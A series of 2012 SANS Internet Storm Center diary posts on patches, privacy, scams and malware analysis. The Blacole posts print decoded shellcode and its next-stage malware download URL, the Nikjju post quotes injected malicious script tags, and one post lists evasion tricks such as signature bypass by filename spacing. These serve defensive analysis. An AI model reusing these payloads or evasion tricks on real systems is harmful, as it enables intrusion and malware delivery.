Published: 2012-04-30

Patch for Oracle TNS Listener issue released !

Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability ( http://isc.sans.edu/diary.html?storyid=13069 )

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that a patch was released today - find details here ==> http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

Shortly after, reader R.P. pointed us to a page that had proof of concept ( with a video no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/

So get that maintenance window scheduled folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

Rob VandenBrink


Published: 2012-04-30

FCC posts Enquiry Documents on Google Wardriving

Remember back in 2010, Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted  wireless networks found during it's Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==> http://www.scribd.com/fullscreen/91652398

It's very interesting reading.  What I found most interesting in the paper was:

  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet’s output during their later analysis. Aside from the fact that anyone who's been in almost any SANS class would realize how wrong using the tool was, at least they didn't go write something from scratch.
  •  Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license. 
  • The suggestion and implementation for the data collection in the controversy came from unnamed engineers ("Engineer Doe" in the paper).  I found it really interesting how the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.

Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say "close only counts in horseshoes and hand grenades" - NOT in Compliance to Privacy rules !

Long story short, this document outlines how the manager(s) of the project trusted the engineers word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have a budget to go down this road, so are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever comes back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of their primary directives is to keep an eye on Privacy Legislation, Regulations and Compliance to said legislation.  Though you can't fault the legal team if the question never gets directed their way  (back to middle managment).

From a project manager point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  in most cases I’ve seen, the implications of changing the scope are all around impacts to budget and schedule, but in this case, a good idea and a neat project (Google Streetview) ended up being associated with activity that ended up being deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that either you exceeded the budget or schedule, mis-estimated the budget or schedule, or in this case didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more an lawyer than "Engineer Doe"


Rob VandenBrink


Published: 2012-04-30

An Impromptu Lesson on Passwords ..

I was reading the other night, which since I've migrated my library means that I was on my iPad.

My kid (he's 11) happened to be in the room, playing a game on one console or another.  I'm deep in my book, and he's deep in his game, when he pipes up with "Y'know Dad?"


"You should enable complex passwords on your tablet"
(Really, he said exactly that!  I guess he was in Settings / Security and wasn't playing a game after all ! )

"Why is that?" I said - (I'm hoping he comes up with a good answer here)

"Because if somebody takes your tablet, it'll be harder for them to guess your password"  (good answer!)

"Good idea - is there anything else I should know?"

"If they guess your password wrong 10 times, your tablet will get wiped out, so they won't get your stuff"  (Oh - bonus points!)

So aside from me having a really proud parent moment, why is this on the ISC page?  It's really good advice, that's why !

It's surprising how many people use the last 4 digits of their phone number, their birthday, or worse yet, their bank card PIN (yes, really) for a password, or have no password at all.  And yet, we have all kinds of confidential information on our tablets and phones - mostly in the form of corporate emails and sometimes documents.

As is the case in so many things, when we in the security community discuss tablet security, it's usually about the more advanced and interesting topics like remote management, remote data wipe or forensics.  These are valuable discussions - but in a lot of cases, basic (and I mean REALLY BASIC) security 101 advice to our user community will go a lot further in enhancing our security position.  Advice like I got from my kid:

  • Set a password !
  • Make sure that it's reasonably complex (letters and numbers)
  • Make sure that it's not a family member name, phone number, birthday, bank PIN or something that might be found on your facebook page
  • Set a screen saver timeout
  • Set the device to lock when you close the cover
  • Delete any documents that you are finished with - remember, the doc on your tablet is just an out of date copy

This may seem like really basic advice, and that's because it is.  But in the current wave of BYOD (Bring Your Own Device) policies that we're seeing at many organizations, we're seeing almost zero attention put on the security of the organization's data.  BYOD seems to be about transferring costs to our users on one hand, and keeping them happy by letting them use their tablets and phones at work (or school).

Good resources for iPad security (as well as Android and other tablets also) can be found in the SANS Reading Room ( http://www.sans.org/reading_room/ )

Vendors also maintain security documentation - Apple has some good (but basic) guidance at ==> http://www.apple.com/ipad/business/docs/iPad_Security.pdf

NIST has guidance for Android and Apple (though both are  bit out of date):

Please, use our COMMENT FORM to pass along any tablet security tips or links you may have.


Rob VandenBrink


Published: 2012-04-29

Who's tracking phone calls that target your computer? Stay Tuned to the ISC

The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010Mark Hofman in May of 2011 and Daniel Wesemann in March of 2012.  This past week I got a call from someone that I thought was a regular old telemarketer until they said they were from a company in Texas providing Microsoft Support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand:)  I got to look at my logs by running "eventvwr" from run line prompt. In my application logs, I found out that warning and error messages were really "viruses" and I should not click on them because they would multiply and destroy my mother board.  I also got to run "inf virus", which just opens the Window's inf folder and disregards the word "virus", and was asked if I downloaded those files.  Of course I said no and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special software that would take care of all of this for me and she would help me.  She asked me to now type "www.logmein123.com" at the run line.  At this point, 40 minutes later, I told her I had to go somewhere.  I asked if I could call her back because I sure didn't want all that stuff on my computer.  She said I could and gave me the number 773-701-5437 and said her name was Peggy.  I didn't have time to finish the call, but I sure would have like to have gotten a VM fired up and see what "special software" she had for me to install.

After the call, I started researching this type of scam and was surprised to see it seemed to be dating back to the 2009 time frame.  However, I could not find any statistics that were tracking this data.  Maybe I am just looking in the wrong place.  I saw guidance from contact your local law enforcement to send an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend nor is there any mention in their report released 26 April 2012 that summarized 2H2011.  It states "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 (“2H2011”, July 1, 2011 through December 31, 2011)."   This type of phishing is something APWG doesn't appear to track at this time.

I consider these calls to still be phishing attempts because according to APWG, phishing is defined as "Phishing is a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials."  The delivery vector is not email in this case but rather a phone call.  The end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?

At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.


Published: 2012-04-27

ISC Feature of the Week: Handler Created Tools


A couple of weeks ago we learned about the handlers at https://isc.sans.edu/diary/ISC+Feature+of+the+Week+Get+to+know+the+Handlers/12985. Today's feature highlights our Handler Created Tools page at https://isc.sans.edu/tools/handler_created.html.


  • A link to the handler tool page is now on https://isc.sans.edu/handler_list.html for handlers with tools posted!
  • Each handler section is separated and accessible directly by name ref #[handlername]
  • The tools are currently categorized by ones that can be:
    • Downloaded and run/installed
    • Accessed online
    • Available on a mobile platform


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-27

Critical Unpatched Oracle Vulnerability

Oracles April "Critical Patch Update" listed a vulnerability in the TNS Listener services as one of the patched vulnerabilities. Sadly, it turns out that current versions of Oracle are not patched. Instead, the vulnerability will apparently only be fixed in future versions of the Oracle database. According to a statement from Oracle quoted by the discoverer of the vulnerability, the fix would have possible had stability issues for current versions of Oracle. [1]

The vulnerability was responsibly reported to Oracle back in 2008. Upon release of the April CPU, Joxean Koret, who originally found the vulnerability, came forward with additional details including a proof of concept exploit, fully expecting that a patch is now available.

So in short: We got an unpatched remote code execution vulnerability in all current versions of Oracle with proof of concept exploit code.

Joxean's details published after the CPU release also include some useful workarounds [2]. Please refer to the post for details.

[1] http://seclists.org/fulldisclosure/2012/Apr/343
[2] http://seclists.org/fulldisclosure/2012/Apr/204


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-26

Define Irony: A medical device with a Virus?


Information Week [1] is running a piece on FDA Checks of Medical Hardware. After some review a NIST [2] paper quickly jumped into my head and memories of past experiences washed forward. After emailing our handlers alias it seems that a few of us have some direct experience in this matter.

To plug the critical controls [3] and just about all apply but to highlight:

CC3: Secure Configuration for Hardware and Software [4]

CC5: Malware Defense [5]


An interesting point to this is that in some cases if you patch a medical device you can void it's FDA certification. So a cunundrum quickly surfaces; to patch the Windows Embedded "Critical Life Saving Device" or not to patch.

Horror story, report of a fetal monitor crashing along with event correlation tracking a malware infected device on same subnet. Ended up that the fetal monitor had been infected with malware, fortunately it was not in use. 

Another interesting confidence builder? "your IV pump is infected, but don't worry, it can't infect any of the *other* patient equipment" ... 

There are some clear root causes to the above scenarios and something that is accelerating this is network convergence along with Bring Your Own Device programs. As most things are transported over Ethernet [6] networks quickly converge for cost savings measures. It becomes more of a challenge to perform proper network segmentation and traffic separation when you converge N services plus X unmanaged devices.

Something we are observing more often are Physical Infrastructure Security systems (e.g. Building Management, Wireless Door lock systems, Camera Infrastructure, etc) being converged onto Ethernet networks that also host data services to users.

We have seen networks that converge, voice (VoIP), Video, Data and iSCSI [7] and I can tell you that, let alone providing quality of service, it can become high management overhead process to perform network segmentation. The issue arises when cost savings causes decision makers to "Accept Risk" of converged networks and sometimes not fully understanding said risks.


Now, some things we can do in the short term:

- Make complaints to your local or state authority (Here in the U.S. that's the FDA [8]). Although this diary is U.S. Centric, it is fairly safe to go down the "Slippery Slope" [9] that a parity of this issue exists in most modern medical institutions.

- Understand what is on your network, apply the critical controls and segment critical infrastructure to mitigate and reduce risk.

- Introduce segmentation controls like Private VLANs. [10] Firewalls for traffic separation, access control lists [11] to restrict device communication.


As the cost savings of Ethernet drives network convergence, we have to take low level measures to reduce risk. Remember a VLAN is not secure traffic separation but only a logical traffic separation measure! It's like saying NAT [12] is a security protocol...


Richard Porter

--- ISC Handler On Duty

Keeping the watch from 35,000 Feet, with In-Flight Wifi on US Flight 1507


[1] http://www.informationweek.com/news/healthcare/security-privacy/232900818

[2] http://csrc.nist.gov/news_events/cps-workshop/cps-workshop_abstract-1_gupta.pdf

[3] http://www.sans.org/critical-security-controls/

[4] http://www.sans.org/cag/control/3.php

[5] http://www.sans.org/cag/control/5.php

[6] http://www.ieee802.org/3/

[7] http://tools.ietf.org/html/rfc3720

[8] http://www.fda.gov/

[9] http://en.wikipedia.org/wiki/List_of_fallacies

[10] http://en.wikipedia.org/wiki/Private_VLAN 

[11] http://en.wikipedia.org/wiki/Access_control_list 

[12] http://en.wikipedia.org/wiki/Network_address_translation




Published: 2012-04-25

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in Shell Code analysis is to "clean it up", in the case at hand here, we have to remove those spurious "script" tags

because they would trip us up in any of the following steps.

Once we're left with only the actual unicode (%uxxyy...) , we can turn this into printable characters:

$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C

00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|

This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).

Next step: Disassemble.

The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:

$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge > decoded.c

results in

0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]

which is the correct format to turn it into

$ cat decoded.c

unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] }

int main() { }

which in turn can be compiled:

$ gcc -O0 -fno-inline decoded.c -o decoded.obj

which in turn can be disassembled:

$ objdump -M intel,i386 -D decoded.obj > decoded.asm

and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":

0000000000600840 <shellcode>:
600840: 41 inc ecx
600841: 41 inc ecx
600842: 41 inc ecx
600843: 41 inc ecx
600844: 66 83 e4 fc and sp,0xfffffffc
600848: fc cld
600849: eb 10 jmp 60085b <shellcode+0x1b>
60084b: 58 pop eax
60084c: 31 c9 xor ecx,ecx
60084e: 66 81 e9 57 fe sub cx,0xfe57
600853: 80 30 28 xor BYTE PTR [eax],0x28
600856: 40 inc eax
600857: e2 fa loop 600853 <shellcode+0x13>
600859: eb 05 jmp 600860 <shellcode+0x20>
60085b: e8 eb ff ff ff call 60084b <shellcode+0xb>
600860: ad lods eax,DWORD PTR ds:[esi]
600861: cc int3
600862: 5d pop ebp

A-Ha! Somebody is XOR-ing something here with 0x28 (line 600853).  If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.

Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP ? Well .. The shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60085b" instruction, the stack will contain 600860 as the return address. The instruction at 60084b then "pops" this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28.

Let's try the same in Perl:

$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin

$ hexdump -C de-xored.bin | tail -5

00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |

Et voilà, we get our next stage URL.

If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.



Published: 2012-04-25

Blacole's obfuscated JavaScript

Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.

Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.

Often, this actually works. The current wave of Blackhole (Blacole) exploit kits are a good example - it took Anti-Virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on Virustotal

Here's what the Blacole obfuscated Javascript looks like:

Unlike "older" obfuscation methods, this "Blacole" encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:


None of this will run in command line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawet are doing a pretty good job at this, but often also trip up.

If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find

This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is >25 and <52, 26 gets added to it. If it is >=52 and <78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a "poor man's Caesar Cipher", swapping out one letter against another.

Something we can readily reproduce in a couple lines of Perl :)

$cat decode.pl
#!/usr/bin/perl -w
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    if (($o>25) && ($o<52)) {
    } elsif (($o>=52) && ($o<78)) {
    } else { $k=$o };
    print chr($k);

And, lo and behold:

$cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.



Published: 2012-04-24

OpenSSL reissues fix for ASN1 BIO vulnerability

OpenSSL has posted an updated advisory today indicating the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability issue for OpenSSL version 0.9.8.

Please note that this latest issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i already contain a patch as released on the 19th sufficient to correct CVE-2012-2110.

Please upgrade to 0.9.8w.




Published: 2012-04-23

Continued interest in Nikjju mass SQL injection campaign

Readers continue to write in conveying updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are target and scripts inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php <</script> and the resulting fake/rogue AV campaigns they subject victims to.

Infected site count estimations vary wildly but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the lihupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.

As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec




Published: 2012-04-23

Comments open for NIST-proposed updates to Digital Signature Standard

The comment period for National Institute of Standards and Technology (NIST) proposed changes to the Digital Signature Standard (FIPS 186-3) is open until May 25, 2012. Submit comments via  fips_186-3_change_notice at nist dot gov, with ''186-3 Change Notice'' in the subject line.

The proposed changes include:

  • "clarification on how to implement the digital signature algorithms approved in the standard: the Digital Signature Algorithm (DSA), the Elliptic Curve Digital Signature Algorithm (ECDSA) and the Rivest-Shamir-Adelman algorithm (RSA)"
  • "allowing the use of additional, approved random number generators, which are used to generate the cryptographic keys used for the generation and verification of digital signatures"

NIST indicates that "the standard provides a means of guaranteeing authenticity in the digital world by means of operations based on complex math that are all but impossible to forge" but that "updates to the standard are still necessary as technology changes."

Comment and feedback on your digital signature implementations are welcome via our comments form.


Russ McRee@holisticinfosec



Published: 2012-04-23

Emergency Operations Centers & Security Incident Management: A Correlation

I spent last Tuesday (17APR2012) taking orientation training at the State Emergency Operations Center (SEOC), a facility operated by the Washington State Military Department, Emergency Management Division. WA SEOC is a fully realized, extremely robust EOC with full authority to fulfill disaster and emergency coordination at the state level. The training was designed to orient attendees to serving or assisting when the EOC is activated during emergencies and disasters.

I was, as I have been during past EOC training or drills I've attended, drawn to the immediate parallels between EOC activity and mature security incident response programs.
Anyone who participates in or serves in a security incident response/management role has likely had the grave displeasure of being part of incident response gone bad. You know the event, it's seared into your memory. No incident command, no structure, everyone running around with their hair on fire, endless FUD and speculation, broken communication streams. and more damage being done than good. I for one, cannot and will not tolerate events unfolding in this manner, and am always thrilled when I see training and robust processes take over during major events. 
EOCs are designed to do this right at a scale few of us can imagine or fathom.
It's one thing to lead your organization through a server compromise or a DDoS attack.
It's quite another to do so where the lives of citizens and millions of dollars of property are in the mix. Life and death decisions change your perspective.
All of which is a long way of getting to the point: there is much to be learned and utilized from the incident management structure utilized by EOCs as it pertains to information security incident response and management.
I'm a huge proponent of "everything in its place, a place for everything" during incidents. Everyone should know their role, what swim lane they should be in, and how to garner the assistance and support they may need.
In an EOC you'll note that seating is arranged in pods. These pods each pertain to an ESF or Emergency Support Function. Such functions include communications (ESF 2), logistics (ESF 7), public safety and security (ESF 13), external affairs (ESF 15), and defense support to civil authorities (ESF 20). 
WA State EOC
Washington State EOC
Not every ESF has a direct match to a role during an information security incident or major event - hopefully you won't need housing, public health, or search and rescue functions (we lost Bobby in the data center!) - but allow me to strengthen my claims to correlation.
The ESF 2 function includes "protection, restoration, and sustainment of national cyber and information technology resources." Check, that sounds like an incident response analyst and/or manager. 
ESF 7 includes logistics planning, management, and sustainment capability as well as resource support. Ever try to muddle through a major information security incident without your operations teams at the ready to perform systems and network functions? 
ESF 13 includes security planning and technical resource assistance along with resource security. Roger that, I see a mitigations working group in the making here, yes? 
ESF 15 provides protective action guidance as well as media and community relations. Indeed. Sounds like the all important information security advisory (patch now, avoid website x) or the pressing need for a good PR response when your high traffic website was defaced.
ESF 20 offers guidance to officials on the coordination of military resources in support of operations during response and recovery. Ack. Subject matter expertise, vulnerability assessment post-mitigation and remediation, after action reports (lessons learned), and defensive tactics oversite.
You get my point. Having a well defined, practiced (drill, drill, drill!) incident management system that springs into action like a well oiled machine is of extraordinary value during major information security incidents.
Following are some resources for you to consider.
Check out FEMA's National Incident Management System (NIMS). You can take NIMS training online via FEMA's Emergency Management Institute. I suggest starting with IS-100.b Introduction to Incident Command System, IS-200.b ICS for Single Resources and Initial Action Incidents, and IS-700.a National Incident Management System (NIMS) An Introduction. I've taken these, as well as four other ISP courses as part of requirements for the Military Emergency Management Specialist (MEMS) Basic level and continue to see content matches to my role in security incident management. Also familiarize yourself with the National Response Framework
If you've noted similar relationships with emergency management practices and information security response and incident management, feel free to share with the readership via the comments form along with any questions you may have.


Published: 2012-04-21

WordPress Release Security Update

WordPress released a security update (version 3.3.2) that fixes 3 external libraries (Plupload, SWFUpload and SWFObject) as well as privilege escalation and cross-site script (XSS) issues as well as 5 other bugs. Change log posted here. The advisory is posted here and you can download the update here.

[1] http://core.trac.wordpress.org/log/branches/3.3?rev=20552&stop_rev=20087
[2] http://wordpress.org/news/2012/04/wordpress-3-3-2/
[3] http://Pluploadwordpress.org/download/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-19

OpenSSL Security Advisory - CVE-2012-2110

Earlier today, the OpenSSL team released a fix for a recently discovered vulnerability that exposes applications, that use certain features of OpenSSL, to a heap overflow.

Since OpenSSL is used extensively, there is much speculation and discussion about who is vulnerable.  Here are some highlights and links of the reading I've done today.  

  • UPGRADE to the latest version as soon as you can. [1]
  • The SSL/TLS code of OpenSSL is *not* affected. [1]
    Which means, OpenSSH is NOT vulnerable.
  • Read a good detailed explanation of the vulnerability by Tavis Ormandy.  [2]  
    Tavis is credited with discovering the vulnerability. 
  • If Apache is using PEM for certificates, and not parsing untrusted data, then you risks are lower. [1]

[1]  http://www.openssl.org/news/secadv_20120419.txt
[2]  http://lists.grok.org.uk/pipermail/full-disclosure/2012-April/086585.html

Feel free to post a comment to discuss anything not spoken for in this diary.

ISC Handler on Duty


Published: 2012-04-18

ISC Feature of the Week: Suspicious Domains

After some maintenance downtime, the Suspicious Domains lists at https://isc.sans.edu/tools/suspicious_domains.html have been re-launched. This project was developed by handler Jason Lam and is an effort to assemble weighted lists of suspicious domains based on tracking, malware and other sources.


Background - https://isc.sans.edu/tools/suspicious_domains.html#background

  • Project description, sources cited and suggested uses of project data.

Lists By Level - https://isc.sans.edu/tools/suspicious_domains.html#lists
Domain lists linked here are categorized by Low, Medium and High sensitivity.

  • The lower the sensitivity, the fewer false positives.
  • Lists are based on ranges so they will overlap at each level.

Domain Whitelist - https://isc.sans.edu/tools/suspicious_domains.html#whitelist
Links to lists of approved and pending known-good domains. Submissions will be reviewed for approval and the form is limited to the following:

  • 20 submissions per 24 hour period
  • Submit one domain at a time
  • Domain must be on one of the current Lists by Level
  • Domain whitelisted will automatically be removed 7 days after dropping off Lists by Level

Search the Lists - https://isc.sans.edu/tools/suspicious_domains.html#search

  • Search for domain history and details:
    • Enter a domain from one of the Lists by Level to view First Added, Last Seen, Source and Whitelist details.
  • Creates a custom domain list file
    Choose criteria on this form to refine a custom suspicious domain list! Results are displayed in a text box so you can easily select all and copy for use.
    - Limit Score Range between 0 to 100 (Higher the score, the more sensitive the domain)
    - Refine Domain Names by Any, All or Like
    - Occurs a minimum of n times 


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-18

Sysinternals Updates - 2012 Apr 17

In case you have not seen or heard, some of our readers pointed us to Monday's posting on the Sysinternals Site Discussion panel about a number of updates that are now available.  

Among the release are updates to the following:

  • NotMyFault
  • Process Monitor v3.01
  • TestLimit v5.2
  • Webcasts from Mark R.
  • Windows Internals 6th Ed. Part 1

Further details can be found at the following url: 


Many thanks to our loyal readers Rene and Roseman for keeping us in the loop.

ISC Handler on Duty




Published: 2012-04-16

McAfee DAT troubles

Thanks to reader Dan for sharing the following information:

McAfee has confirmed that incremental DAT 6682 may trigger message scan failures and a system crash in GroupShield Exchange (MSME), GroupShield Domino, and McAfee Email Gateway 7 (MEG).  McAfee recommends that customers do NOT upload DAT 6682.
More information will be available on the McAfee KnowledgeBase (https://mysupport.mcafee.com) in article KB70380 (https://kc.mcafee.com/corporate/index?page=content&id=KB70380). Please check back to this KB article for further updates.


Published: 2012-04-16

Challenge: What can you do with Funky Directory Names (Part 2)

Following up on last weeks challenge I'd like to add a new element to the challenge, then review some of the EXCELLENT  comments we received from our readers.     First lets add a new element to the challenge and see how you can creatively make use of symbolic links on Windows.    I'll throw a few things out there to get the ball rolling.

1) Using Infinitely recursive directories to defeat directory searching scripts:   As described in this excellent presentation on "Offensive Countermeasures"  by my friends John Strand and Paul Asodoorian, you can create symbolic links to the current working directory to cause directory searches to get stuck in an infinite loop.      They begin talking about it at the 25 minute mark  in this video ::http://www.youtube.com/watch?v=p0gWAbMjg1U     In short you can create symbilic link directories to the current directory and cause anyone searching your hard drive (including malware and antivirus scans)  to get caught in an infinite loop.

2)   Create links to devices such as boot sector and  to alternate data streams:

You can use symbolic links to access items in alternate data streams and items in disk partitions that are normally not easily accessed.   For example, if you have a separate boot partition you can use symbolic links to access it and even hide files in It.



3)    Symbolic links to Volume Shadow Copies:

Windows Volume shadows copies automatically maintain backups of the last 5-15 percent of all changes on your computer.   It is a bit like Apple's time machine without the fancy GUI or the offline storage.    This link shows you how to step back in time and see exactly what was on your systems a few days ago.   Oh,  You thought you deleted those files?  You might want to check this out.


Interesting, you can also stage malware in volume shadow copes and then execute the malware directly from the shadow copy.



So there you go.   What can you do with Symbolic links?    We still don't have an explanation for the error message or strange behavior noted in the last challenge.     What can you tell us about them?    POST A COMMENT or SEND ME AN EMAIL!      If you missed them here are some of the great comments we got from readers of the last challenge:

 Original Comments and challenge are here: https://isc.sans.edu/diary/Challenge+What+can+you+do+with+funky+directory+names+/12958

Readers comments:  Add space to filename to bypass Digital signatures on Microsoft policies.    

This was a very interesting comment from reader Aaron.    It seems that Aaron had some success bypassing digital signature checks.   He reports that the process that checks a digital signature may ignore spaces at the end of the file causing windows to check the actual file with a good signature.  The result is that malware named "svchost.exe " (svchost.exe with a space at the end) may appear to be digitally signed to some apps.   That's all I'll say about that one. 


Reader comments:  Creating Extended character directory names with the alt key/numeric keypads.

As you probably know, we can use the ALT key and the Numeric keypad to type extended ASCII characters.   Combine that with the ability to create files and directories with normally prohibited characters and you've got some PRETTY directories on your hands.    Create smiley fact, hearts, diamonds and other interesting directories on your windows systems.  



Reader comments:   Still no answer for the strange 8.3 names given to files/directories   

We had several excellent comments and emails on the strange 8.3 directory names created when you create a directory or file with a character in its name that is prohibited by the normal  file/directory creation process.     Normally 8.3 shortnames are only given to files or directories that are longer than 8 characters in length.    In this case, the 8.3 names are assigned seemingly at random to these files event though they are not more than 8 characters long.  

HEY! I'm teaching SANS SEC560 BOOTCAMP Style in Augusta GA June 11th - 16th.   Sign up today!  http://www.sans.org/community/event/sec560-augusta-jun-2012



Published: 2012-04-15

.Net update affects printing from some applications

We have received comments from our readers that the most recent Microsoft .Net framework update may have affected printing from some applications. TurboTax has released an update to address this issue in their software and Microsoft has updated the MS12-025 KB article to indicate they are aware of the problem.

Microsoft's suggested workaround is:

"To print from an affected Windows Forms application, print the content to a file on your computer instead of directly printing to a printer device. For example, print to a PDF, XPS, or any other supported format file. You can then open the file that you created and print directly from there."

